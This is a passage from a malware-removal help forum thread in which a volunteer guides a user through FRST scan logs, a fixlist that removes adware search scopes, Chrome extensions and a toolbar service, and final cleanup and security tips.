2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:01 - 2014-09-11 19:45 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 07:57 - 2014-09-14 07:56 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-14 07:46 - 2006-11-02 06:34 - 00000285 _____ () C:\Windows\win.ini
2014-09-13 10:33 - 2014-09-11 19:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-13 09:23 - 2011-04-13 05:34 - 00000000 ____D () C:\Users\Hogg\Desktop\Aviation
2014-09-13 09:22 - 2009-10-18 20:33 - 00000000 ____D () C:\Users\Hogg\Desktop\Fitness
2014-09-13 09:16 - 2014-09-13 09:00 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 09:01 - 2014-03-05 19:29 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-09-13 09:01 - 2013-11-22 09:58 - 00000000 ____D () C:\Program Files (x86)\PasswordBox
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 07:57 - 2006-11-02 09:21 - 00412128 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-12 21:08 - 2009-08-06 10:20 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-09-12 21:04 - 2009-08-07 11:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Games
2014-09-12 20:31 - 2012-05-31 09:19 - 00000000 ____D () C:\Users\Hogg\Desktop\Dad Stuff
2014-09-12 20:26 - 2009-08-07 09:25 - 00112704 _____ () C:\Users\Hogg\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-12 20:18 - 2013-01-18 22:30 - 00000000 ____D () C:\FlightTest5
2014-09-12 20:12 - 2013-06-17 12:09 - 00000483 _____ () C:\0
2014-09-12 20:08 - 2012-10-08 19:59 - 00000000 ____D () C:\Users\Hogg\Desktop\Court Stuff
2014-09-12 19:43 - 2009-10-05 20:32 - 00000000 ____D () C:\Users\Hogg\AppData\Local\PowerCinema
2014-09-12 19:40 - 2009-08-06 10:45 - 00000000 ____D () C:\Program Files (x86)\SMINST
2014-09-12 16:46 - 2006-11-02 09:07 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-09-12 12:03 - 2010-01-15 11:32 - 00000000 ____D () C:\Windows\Hewlett-Packard
2014-09-12 08:08 - 2012-12-14 10:04 - 00003682 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-12 08:08 - 2012-04-01 10:36 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-12 08:08 - 2012-02-05 12:03 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2012-07-31 08:59 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000943 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-11 07:37 - 2009-08-06 10:44 - 00000000 ____D () C:\ProgramData\Norton
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:08 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:08 - 2009-08-07 09:19 - 00000000 ____D () C:\Users\Hogg
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-09 16:14 - 2012-05-24 19:58 - 00003558 _____ () C:\Windows\System32\Tasks\Norton Security Scan for Hogg
2014-09-08 20:24 - 2014-08-16 10:09 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-31 10:00 - 2009-08-07 09:43 - 00000552 _____ () C:\Windows\Tasks\PCDRScheduledMaintenance.job
2014-08-29 13:01 - 2006-11-02 06:35 - 101694776 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-08-29 10:05 - 2014-08-29 10:04 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-29 01:48 - 2013-06-30 07:49 - 00000440 _____ () C:\Windows\Tasks\PC Helper 360.job
2014-08-25 06:53 - 2009-10-07 07:01 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-08-18 12:55 - 2010-03-28 20:39 - 00000000 ____D () C:\Users\Hogg\Desktop\Football Stuff

Some content of TEMP:
====================
C:\Users\Hogg\AppData\Local\temp\Quarantine.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-15 12:50

==================== End Of Log ============================



#8 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:24 PM

Posted 15 September 2014 - 06:37 PM

How is your computer running now?


Please download this attached Attached File  fixlist.txt   1.87KB   3 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


#9 mleehogg

mleehogg
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:24 AM

Posted 15 September 2014 - 07:16 PM

I'm not sure where to save the fixlist? Do I save it in the "logs" folder of the FRST file?



#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:24 PM

Posted 15 September 2014 - 08:33 PM

You have to download FRST again but don't open it directly from the browser but save it to your Desktop. Then you can save the fixlist to the Desktop as well and run FRST from there.

#11 mleehogg

mleehogg
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:24 AM

Posted 16 September 2014 - 09:37 AM

Thank you. Computer seems to be doing much better.

 

Here is the fix log.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 12-09-2014
Ran by Hogg at 2014-09-15 20:22:04 Run:1
Running from C:\Users\Hogg\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
C:\ProgramData\Windows Genuine Advantage
C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Users\nkkmebodcglnimjjbopgchmhpbmfdnpk
C:\Users\Hogg\AppData\Local\06f3f051-63b1-4d25-bc86-788f5e8250f9.crx
C:\Users\Hogg\AppData\Local\71A87F04-31A1-11E2-8271-B8AC6F996F26.crx
C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx
C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Users\afkgilhfgajhpdmckpbmdgkapgdjndbb
SearchScopes: HKLM - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKCU - {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3309350&CUI=UN22661023661384124&UM=2
Winsock: Catalog5 01 C:\Windows\SysWOW64\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 01 %SystemRoot%\System32\mswsock.dll [304128] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
CHR HKCU\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
S2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [X]
Folder: C:\ProgramData\WindowsSearch
EmptyTemp:
*****************

C:\ProgramData\Windows Genuine Advantage => Moved successfully.
C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Users\nkkmebodcglnimjjbopgchmhpbmfdnpk => Moved successfully.
C:\Users\Hogg\AppData\Local\06f3f051-63b1-4d25-bc86-788f5e8250f9.crx => Moved successfully.
C:\Users\Hogg\AppData\Local\71A87F04-31A1-11E2-8271-B8AC6F996F26.crx => Moved successfully.
C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx => Moved successfully.
C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Users\afkgilhfgajhpdmckpbmdgkapgdjndbb => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key deleted successfully.
"HKCR\CLSID\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{FB144184-B500-42F4-9A1B-8A558CB28A3F}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{FB144184-B500-42F4-9A1B-8A558CB28A3F}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{4591E5ED-D4E2-45E9-9618-6C9ABFE25973}" => Key deleted successfully.
"HKCR\CLSID\{4591E5ED-D4E2-45E9-9618-6C9ABFE25973}" => Key not found.
Winsock: Catalog5 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\system32\NLAapi.dll
Winsock: Catalog5-x64 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\system32\NLAapi.dll
"HKCU\SOFTWARE\Google\Chrome\Extensions\iigplimlmgilpobjilfbfeilnpiigpgl" => Key deleted successfully.
"C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx" => File/Directory not found.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\iigplimlmgilpobjilfbfeilnpiigpgl" => Key deleted successfully.
"C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx" => File/Directory not found.
vToolbarUpdater18.1.9 => Service deleted successfully.

========================= Folder: C:\ProgramData\WindowsSearch ========================

2014-09-14 09:08 - 2014-09-14 09:08 - 0000000 ____D () C:\ProgramData\WindowsSearch\MiniDumps
2014-09-14 09:08 - 2014-09-14 09:09 - 0008411 _____ () C:\ProgramData\WindowsSearch\MiniDumps\Microsoft Windows Search Filter Host_0.kdmp

====== End of Folder: ======

EmptyTemp: => Removed 1.1 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====



#12 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:24 PM

Posted 16 September 2014 - 10:05 AM

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe in Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Java™ 6 Update 38




Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#13 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:24 PM

Posted 29 September 2014 - 09:10 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users